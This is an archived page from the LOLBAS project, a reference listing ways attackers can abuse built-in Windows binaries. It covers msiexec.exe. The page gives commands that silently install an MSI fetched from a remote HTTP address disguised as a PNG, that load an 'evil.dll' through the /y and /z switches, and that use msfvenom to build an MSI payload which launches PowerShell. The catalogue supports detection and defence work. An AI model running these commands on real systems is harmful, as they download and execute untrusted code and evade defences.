Skip to content
This repository has been archived by the owner on Dec 11, 2018. It is now read-only.

Latest commit

 

History

History
42 lines (29 loc) · 863 Bytes

Msiexec.md

File metadata and controls

42 lines (29 loc) · 863 Bytes

UPDATE BOOKMARKS - PROJECT MOVED TO A DEDICATED PROJECT SITE. THIS SITE WILL NOT BE UPDATED ANYMORE, BUT WILL BE KEPT FOR HISTORICAL REASONS.

New site: https://github.com/LOLBAS-Project/LOLBAS Web portal: https://lolbas-project.github.io/

Msiexec.exe

  • Functions: Execute
msiexec /quiet /i cmd.msi    

msiexec /q /i http://192.168.100.3/tmp/cmd.png   

msiexec /y "C:\folder\evil.dll"   

msiexec /z "C:\folder\evil.dll"   

Acknowledgements:

  • ? - @netbiosX
  • PhilipTsukerman - @PhilipTsukerman

Code sample: *

Resources:

Full path:

c:\windows\system32\msiexec.exe
c:\windows\sysWOW64\msiexec.exe

Notes: Generate MSI file:

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi